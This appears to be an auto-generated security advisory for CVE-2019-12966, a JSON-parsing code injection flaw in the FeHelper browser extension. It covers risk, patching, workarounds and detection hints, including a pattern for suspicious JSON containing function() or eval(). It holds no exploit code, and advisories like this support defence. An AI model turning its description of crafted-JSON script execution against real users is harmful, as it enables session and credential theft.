CVE-2019-12966
📋 TL;DR
FeHelper browser extension versions through June 19, 2019 contain a code injection vulnerability in JSON parsing functionality. Attackers can execute arbitrary JavaScript code by crafting malicious JSON input, potentially compromising user sessions and browser security. This affects all users of vulnerable FeHelper versions across Chrome, Firefox, and other supported browsers.
💻 Affected Systems
- FeHelper browser extension
📦 What is this software?
Fehelper by Fehelper Project
⚠️ Risk & Real-World Impact
Worst Case
Full browser compromise allowing attackers to steal credentials, session cookies, sensitive data, install malware, or perform actions as the authenticated user.
Likely Case
Session hijacking, credential theft, and data exfiltration from the browser context where FeHelper is active.
If Mitigated
Limited impact if extension is disabled or removed, though users may lose functionality.
🎯 Exploit Status
Proof of concept demonstrates simple JavaScript execution via crafted JSON. Attack requires user to visit malicious website or process malicious JSON data.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Versions after 2019-06-19
Vendor Advisory: https://github.com/zxlie/FeHelper/issues/63
Restart Required: No
Instructions:
1. Open browser extensions page. 2. Find FeHelper extension. 3. Check for updates or remove if no update available. 4. If updating manually, download latest version from official repository.
🔧 Temporary Workarounds
Disable FeHelper Extension
allTemporarily disable the FeHelper extension to prevent exploitation.
Browser-specific: chrome://extensions/ or about:addons
Remove FeHelper Extension
allCompletely remove the vulnerable extension until patched version is available.
Browser-specific removal via extensions management page
🧯 If You Can't Patch
- Disable FeHelper extension immediately in all browsers
- Implement Content Security Policy (CSP) headers on web applications to restrict script execution
🔍 How to Verify
Check if Vulnerable:
Check FeHelper version in browser extensions page. If version date is 2019-06-19 or earlier, you are vulnerable.Check Version:
Browser-specific: Check extensions management page for FeHelper version detailsVerify Fix Applied:
Verify FeHelper version is updated beyond 2019-06-19 or extension is removed/disabled.📡 Detection & Monitoring
Log Indicators:
- Unusual JavaScript execution in browser context
- FeHelper extension errors or crashes
Network Indicators:
- Requests to unexpected domains following JSON processing
- Unusual data exfiltration patterns
SIEM Query:
Browser extension logs showing FeHelper activity with suspicious JSON payloads containing function() or eval() patterns